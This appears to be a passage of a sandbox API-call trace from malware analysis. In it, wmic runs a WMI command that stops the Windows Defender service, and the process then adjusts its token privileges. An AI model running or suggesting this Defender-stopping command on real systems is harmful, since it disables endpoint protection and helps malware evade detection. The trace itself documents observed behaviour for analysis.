[0250.621] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0250.621] malloc (_Size=0xa) returned 0x61cb60 [0250.621] malloc (_Size=0x30) returned 0x6185c0 [0250.621] memmove_s (in: _Destination=0x6185c0, _DestinationSize=0x20, _Source=0x61cf00, _SourceSize=0x20 | out: _Destination=0x6185c0) returned 0x0 [0250.621] free (_Block=0x61cf00) [0250.621] free (_Block=0x0) [0250.621] free (_Block=0x61cba0) [0250.621] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 71 [0250.621] malloc (_Size=0x18) returned 0x61cba0 [0250.621] lstrlenW (lpString="stopservice") returned 11 [0250.621] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0250.621] malloc (_Size=0x18) returned 0x61cb20 [0250.621] free (_Block=0x0) [0250.621] free (_Block=0x61cba0) [0250.621] malloc (_Size=0x30) returned 0x618640 [0250.621] lstrlenW (lpString="QUIT") returned 4 [0250.621] lstrlenW (lpString="path") returned 4 [0250.621] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0250.621] lstrlenW (lpString="EXIT") returned 4 [0250.622] lstrlenW (lpString="path") returned 4 [0250.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0250.622] free (_Block=0x618640) [0250.622] WbemLocator:IUnknown:AddRef (This=0x1e91390) returned 0x2 [0250.622] malloc (_Size=0x30) returned 0x618640 [0250.622] lstrlenW (lpString="/") returned 1 [0250.622] lstrlenW (lpString="path") returned 4 [0250.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0250.622] lstrlenW (lpString="-") returned 1 [0250.622] lstrlenW (lpString="path") returned 4 [0250.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0250.622] lstrlenW (lpString="CLASS") returned 5 [0250.622] lstrlenW (lpString="path") returned 4 [0250.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0250.622] lstrlenW (lpString="PATH") returned 4 [0250.622] lstrlenW (lpString="path") returned 4 [0250.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0250.623] lstrlenW (lpString="/") returned 1 [0250.623] lstrlenW (lpString="Win32_Service") returned 13 [0250.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0250.623] lstrlenW (lpString="-") returned 1 [0250.623] lstrlenW (lpString="Win32_Service") returned 13 [0250.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0250.623] lstrlenW (lpString="Win32_Service") returned 13 [0250.623] malloc (_Size=0x1c) returned 0x61cf00 [0250.623] lstrlenW (lpString="Win32_Service") returned 13 [0250.623] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0250.623] lstrlenW (lpString="Win32_Service") returned 13 [0250.623] malloc (_Size=0x1c) returned 0x617150 [0250.623] lstrlenW (lpString="Win32_Service") returned 13 [0250.623] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffc562a0 | out: _String=0x0, _Context=0xffffffffffc562a0) returned 0x0 [0250.623] lstrlenW (lpString="") returned 0 [0250.623] lstrlenW (lpString="WHERE") returned 5 [0250.623] lstrlenW (lpString="where") returned 5 [0250.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0250.623] lstrlenW (lpString="/") returned 1 [0250.623] lstrlenW (lpString="name like '%%WinDefend%%'") returned 25 [0250.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%WinDefend%%'", cchCount1=25, lpString2="/", cchCount2=1) returned 3 [0250.623] lstrlenW (lpString="-") returned 1 [0250.624] lstrlenW (lpString="name like '%%WinDefend%%'") returned 25 [0250.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%WinDefend%%'", cchCount1=25, lpString2="-", cchCount2=1) returned 3 [0250.624] lstrlenW (lpString="name like '%%WinDefend%%'") returned 25 [0250.624] malloc (_Size=0x34) returned 0x618680 [0250.624] lstrlenW (lpString="name like '%%WinDefend%%'") returned 25 [0250.624] lstrlenW (lpString="/") returned 1 [0250.624] lstrlenW (lpString="call") returned 4 [0250.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0250.624] lstrlenW (lpString="-") returned 1 [0250.624] lstrlenW (lpString="call") returned 4 [0250.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0250.624] lstrlenW (lpString="call") returned 4 [0250.624] malloc (_Size=0xa) returned 0x61cba0 [0250.624] lstrlenW (lpString="call") returned 4 [0250.624] lstrlenW (lpString="GET") returned 3 [0250.624] lstrlenW (lpString="call") returned 4 [0250.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0250.624] lstrlenW (lpString="LIST") returned 4 [0250.624] lstrlenW (lpString="call") returned 4 [0250.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0250.624] lstrlenW (lpString="SET") returned 3 [0250.624] lstrlenW (lpString="call") returned 4 [0250.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0250.624] lstrlenW (lpString="CREATE") returned 6 [0250.624] lstrlenW (lpString="call") returned 4 [0250.625] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0250.625] lstrlenW (lpString="CALL") returned 4 [0250.625] lstrlenW (lpString="call") returned 4 [0250.625] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0250.625] lstrlenW (lpString="/") returned 1 [0250.625] lstrlenW (lpString="stopservice") returned 11 [0250.625] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0250.625] lstrlenW (lpString="-") returned 1 [0250.625] lstrlenW (lpString="stopservice") returned 11 [0250.625] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0250.625] lstrlenW (lpString="stopservice") returned 11 [0250.625] malloc (_Size=0x18) returned 0x61cbc0 [0250.625] lstrlenW (lpString="stopservice") returned 11 [0250.625] ??0CHString@@QEAA@XZ () returned 0x26d138 [0250.625] GetCurrentThreadId () returned 0xdc [0250.625] GetCurrentThreadId () returned 0xdc [0250.625] ??0CHString@@QEAA@XZ () returned 0x26cf08 [0250.625] malloc (_Size=0x8) returned 0x61cf60 [0250.625] malloc (_Size=0x18) returned 0x61cbe0 [0250.625] malloc (_Size=0x18) returned 0x61cc00 [0250.625] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e91390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffeb2950 | out: ppNamespace=0xffeb2950*=0x1ea3a98) returned 0x0 [0250.645] free (_Block=0x61cc00) [0250.645] CoSetProxyBlanket (pProxy=0x1ea3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0250.645] free (_Block=0x61cf60) [0250.645] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0250.645] free (_Block=0x61cbe0) [0250.646] malloc (_Size=0x18) returned 0x61cbe0 [0250.646] IWbemServices:GetObject (in: This=0x1ea3a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x26d118*=0x0, ppCallResult=0x0 | out: ppObject=0x26d118*=0x1ecbfa0, ppCallResult=0x0) returned 0x0 [0250.673] free (_Block=0x61cbe0) [0250.674] IWbemClassObject:BeginMethodEnumeration (This=0x1ecbfa0, lEnumFlags=0) returned 0x0 [0250.674] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*="StartService", ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x1ecc4a0) returned 0x0 [0250.674] lstrlenW (lpString="StartService") returned 12 [0250.674] lstrlenW (lpString="stopservice") returned 11 [0250.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0250.674] IUnknown:Release (This=0x1ecc4a0) returned 0x0 [0250.674] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*="StopService", ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x1ecc4a0) returned 0x0 [0250.674] lstrlenW (lpString="StopService") returned 11 [0250.674] lstrlenW (lpString="stopservice") returned 11 [0250.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0250.674] malloc (_Size=0x70) returned 0x61cf60 [0250.674] ??0CHString@@QEAA@XZ () returned 0x26cac8 [0250.674] GetCurrentThreadId () returned 0xdc [0250.675] IWbemClassObject:GetNames (in: This=0x1ecc4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x26cac0 | out: pNames=0x26cac0*="\x01ƀ\x08") returned 0x0 [0250.675] SafeArrayGetLBound (in: psa=0x454ae0, nDim=0x1, plLbound=0x26cad8 | out: plLbound=0x26cad8) returned 0x0 [0250.675] SafeArrayGetUBound (in: psa=0x454ae0, nDim=0x1, plUbound=0x26cad4 | out: plUbound=0x26cad4) returned 0x0 [0250.675] SafeArrayGetElement (in: psa=0x454ae0, rgIndices=0x26cab4, pv=0x26cab8 | out: pv=0x26cab8) returned 0x0 [0250.675] malloc (_Size=0x48) returned 0x61cfe0 [0250.675] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1ecc4a0, wszProperty="ReturnValue", ppQualSet=0x26c908 | out: ppQualSet=0x26c908*=0x1e913b0) returned 0x0 [0250.675] malloc (_Size=0x18) returned 0x61cbe0 [0250.675] IWbemQualifierSet:Get (in: This=0x1e913b0, wszName="CIMTYPE", lFlags=0, pVal=0x26c990*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x26c990*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0250.676] free (_Block=0x61cbe0) [0250.676] malloc (_Size=0x18) returned 0x61cbe0 [0250.676] IWbemClassObject:Get (in: This=0x1ecc4a0, wszName="ReturnValue", lFlags=0, pVal=0x26ca38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x26c918*=2541920, plFlavor=0x0 | out: pVal=0x26ca38*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x26c918*=19, plFlavor=0x0) returned 0x0 [0250.676] malloc (_Size=0x18) returned 0x61cc00 [0250.676] IWbemQualifierSet:Get (in: This=0x1e913b0, wszName="read", lFlags=0, pVal=0x26c920*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffeb2ac0), plFlavor=0x0 | out: pVal=0x26c920*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffeb2ac0), plFlavor=0x0) returned 0x80041002 [0250.676] free (_Block=0x61cc00) [0250.676] malloc (_Size=0x18) returned 0x61cc00 [0250.676] IWbemQualifierSet:Get (in: This=0x1e913b0, wszName="write", lFlags=0, pVal=0x26c920*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffeb2ac0), plFlavor=0x0 | out: pVal=0x26c920*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffeb2ac0), plFlavor=0x0) returned 0x80041002 [0250.676] free (_Block=0x61cc00) [0250.676] malloc (_Size=0x18) returned 0x61cc00 [0250.677] malloc (_Size=0x18) returned 0x61cc20 [0250.677] IWbemQualifierSet:Get (in: This=0x1e913b0, wszName="Description", lFlags=0, pVal=0x26c9d0*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffe54293, varVal2=0x26c9d8), plFlavor=0x0 | out: pVal=0x26c9d0*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffe54293, varVal2=0x26c9d8), plFlavor=0x0) returned 0x80041002 [0250.677] free (_Block=0x61cc20) [0250.677] malloc (_Size=0x18) returned 0x61cc20 [0250.677] lstrlenA (lpString="Not Available") returned 13 [0250.677] malloc (_Size=0x1c) returned 0x61d030 [0250.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffe422f0, cbMultiByte=-1, lpWideCharStr=0x61d030, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0250.677] free (_Block=0x61d030) [0250.677] IUnknown:Release (This=0x1e913b0) returned 0x0 [0250.677] malloc (_Size=0x48) returned 0x61d030 [0250.677] malloc (_Size=0x18) returned 0x61cc40 [0250.677] malloc (_Size=0x48) returned 0x61d080 [0250.677] malloc (_Size=0x70) returned 0x61d0d0 [0250.677] malloc (_Size=0x48) returned 0x61d150 [0250.677] free (_Block=0x61d080) [0250.677] free (_Block=0x61d030) [0250.678] free (_Block=0x61cfe0) [0250.678] free (_Block=0x61cc00) [0250.678] free (_Block=0x61cc20) [0250.678] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0250.678] IWbemClassObject:GetMethodQualifierSet (in: This=0x1ecbfa0, wszMethod="StopService", ppQualSet=0x26d038 | out: ppQualSet=0x26d038*=0x1e913b0) returned 0x0 [0250.678] malloc (_Size=0x18) returned 0x61cc20 [0250.678] IWbemQualifierSet:Get (in: This=0x1e913b0, wszName="Implemented", lFlags=0, pVal=0x26d048*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d410b5c0a66, varVal2=0xffe544fb), plFlavor=0x0 | out: pVal=0x26d048*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d410b5c0a66, varVal2=0xffe544fb), plFlavor=0x0) returned 0x80041002 [0250.678] free (_Block=0x61cc20) [0250.678] malloc (_Size=0x18) returned 0x61cc20 [0250.678] malloc (_Size=0x18) returned 0x61cc00 [0250.678] IWbemQualifierSet:Get (in: This=0x1e913b0, wszName="Description", lFlags=0, pVal=0x26d060*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffeb2948, varVal2=0xdc), plFlavor=0x0 | out: pVal=0x26d060*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0xdc), plFlavor=0x0) returned 0x0 [0250.679] free (_Block=0x61cc00) [0250.679] malloc (_Size=0x18) returned 0x61cc00 [0250.679] IUnknown:Release (This=0x1e913b0) returned 0x0 [0250.679] malloc (_Size=0x70) returned 0x61cfe0 [0250.679] malloc (_Size=0x70) returned 0x61d1a0 [0250.679] malloc (_Size=0x48) returned 0x61d060 [0250.679] malloc (_Size=0x18) returned 0x61cc60 [0250.679] malloc (_Size=0x70) returned 0x61d220 [0250.679] malloc (_Size=0x70) returned 0x61d2a0 [0250.679] malloc (_Size=0x48) returned 0x61d320 [0250.679] malloc (_Size=0x50) returned 0x61d370 [0250.679] malloc (_Size=0x70) returned 0x61d3d0 [0250.679] malloc (_Size=0x70) returned 0x61d450 [0250.679] malloc (_Size=0x48) returned 0x61d4d0 [0250.679] free (_Block=0x61d320) [0250.679] free (_Block=0x61d2a0) [0250.679] free (_Block=0x61d220) [0250.679] free (_Block=0x61d060) [0250.679] free (_Block=0x61d1a0) [0250.679] free (_Block=0x61cfe0) [0250.679] IUnknown:Release (This=0x1ecc4a0) returned 0x0 [0250.680] free (_Block=0x61d150) [0250.680] free (_Block=0x61d0d0) [0250.680] free (_Block=0x61cf60) [0250.680] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*="PauseService", ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x1ecc4a0) returned 0x0 [0250.680] lstrlenW (lpString="PauseService") returned 12 [0250.680] lstrlenW (lpString="stopservice") returned 11 [0250.680] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0250.680] IUnknown:Release (This=0x1ecc4a0) returned 0x0 [0250.680] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*="ResumeService", ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x1ecc4a0) returned 0x0 [0250.680] lstrlenW (lpString="ResumeService") returned 13 [0250.680] lstrlenW (lpString="stopservice") returned 11 [0250.680] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0250.680] IUnknown:Release (This=0x1ecc4a0) returned 0x0 [0250.680] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*="InterrogateService", ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x1ecc4a0) returned 0x0 [0250.680] lstrlenW (lpString="InterrogateService") returned 18 [0250.680] lstrlenW (lpString="stopservice") returned 11 [0250.680] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0250.681] IUnknown:Release (This=0x1ecc4a0) returned 0x0 [0250.681] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*="UserControlService", ppInSignature=0x26d100*=0x1ecc520, ppOutSignature=0x26d108*=0x1ecca20) returned 0x0 [0250.681] lstrlenW (lpString="UserControlService") returned 18 [0250.681] lstrlenW (lpString="stopservice") returned 11 [0250.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0250.681] IUnknown:Release (This=0x1ecc520) returned 0x0 [0250.681] IUnknown:Release (This=0x1ecca20) returned 0x0 [0250.681] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*="Create", ppInSignature=0x26d100*=0x1ece470, ppOutSignature=0x26d108*=0x1ece970) returned 0x0 [0250.682] lstrlenW (lpString="Create") returned 6 [0250.682] lstrlenW (lpString="stopservice") returned 11 [0250.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0250.682] IUnknown:Release (This=0x1ece470) returned 0x0 [0250.682] IUnknown:Release (This=0x1ece970) returned 0x0 [0250.682] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*="Change", ppInSignature=0x26d100*=0x1ece1f0, ppOutSignature=0x26d108*=0x1ece6f0) returned 0x0 [0250.682] lstrlenW (lpString="Change") returned 6 [0250.682] lstrlenW (lpString="stopservice") returned 11 [0250.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0250.682] IUnknown:Release (This=0x1ece1f0) returned 0x0 [0250.682] IUnknown:Release (This=0x1ece6f0) returned 0x0 [0250.682] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*="ChangeStartMode", ppInSignature=0x26d100*=0x1ecc610, ppOutSignature=0x26d108*=0x1eccb10) returned 0x0 [0250.682] lstrlenW (lpString="ChangeStartMode") returned 15 [0250.682] lstrlenW (lpString="stopservice") returned 11 [0250.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0250.682] IUnknown:Release (This=0x1ecc610) returned 0x0 [0250.683] IUnknown:Release (This=0x1eccb10) returned 0x0 [0250.683] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*="Delete", ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x1ecc4a0) returned 0x0 [0250.683] lstrlenW (lpString="Delete") returned 6 [0250.683] lstrlenW (lpString="stopservice") returned 11 [0250.683] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0250.683] IUnknown:Release (This=0x1ecc4a0) returned 0x0 [0250.683] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*="GetSecurityDescriptor", ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x1ecc640) returned 0x0 [0250.683] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0250.683] lstrlenW (lpString="stopservice") returned 11 [0250.683] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0250.683] IUnknown:Release (This=0x1ecc640) returned 0x0 [0250.683] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*="SetSecurityDescriptor", ppInSignature=0x26d100*=0x1ecc520, ppOutSignature=0x26d108*=0x1ecca20) returned 0x0 [0250.683] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0250.683] lstrlenW (lpString="stopservice") returned 11 [0250.683] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0250.683] IUnknown:Release (This=0x1ecc520) returned 0x0 [0250.683] IUnknown:Release (This=0x1ecca20) returned 0x0 [0250.683] IWbemClassObject:NextMethod (in: This=0x1ecbfa0, lFlags=0, pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0 | out: pstrName=0x26d0f8*=0x0, ppInSignature=0x26d100*=0x0, ppOutSignature=0x26d108*=0x0) returned 0x40005 [0250.683] IUnknown:Release (This=0x1ecbfa0) returned 0x0 [0250.683] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0250.683] lstrlenW (lpString="SET") returned 3 [0250.684] lstrlenW (lpString="call") returned 4 [0250.684] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0250.684] lstrlenW (lpString="CREATE") returned 6 [0250.684] lstrlenW (lpString="call") returned 4 [0250.684] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0250.684] free (_Block=0x618640) [0250.684] malloc (_Size=0x8) returned 0x61cf60 [0250.684] lstrlenW (lpString="GET") returned 3 [0250.684] lstrlenW (lpString="call") returned 4 [0250.684] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0250.684] lstrlenW (lpString="LIST") returned 4 [0250.684] lstrlenW (lpString="call") returned 4 [0250.684] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0250.684] lstrlenW (lpString="ASSOC") returned 5 [0250.685] lstrlenW (lpString="call") returned 4 [0250.685] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0250.685] WbemLocator:IUnknown:AddRef (This=0x1e91390) returned 0x3 [0250.685] free (_Block=0x616a60) [0250.685] lstrlenW (lpString="") returned 0 [0250.685] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.685] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0250.685] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.685] malloc (_Size=0x14) returned 0x61cc80 [0250.685] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.685] GetCurrentThreadId () returned 0xdc [0250.685] GetCurrentProcess () returned 0xffffffffffffffff [0250.685] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x26f440 | out: TokenHandle=0x26f440*=0x298) returned 1 [0250.685] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26f438 | out: TokenInformation=0x0, ReturnLength=0x26f438) returned 0 [0250.685] malloc (_Size=0x118) returned 0x61cf80 [0250.685] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x61cf80, TokenInformationLength=0x118, ReturnLength=0x26f438 | out: TokenInformation=0x61cf80, ReturnLength=0x26f438) returned 1 [0250.685] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x61cf80*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, 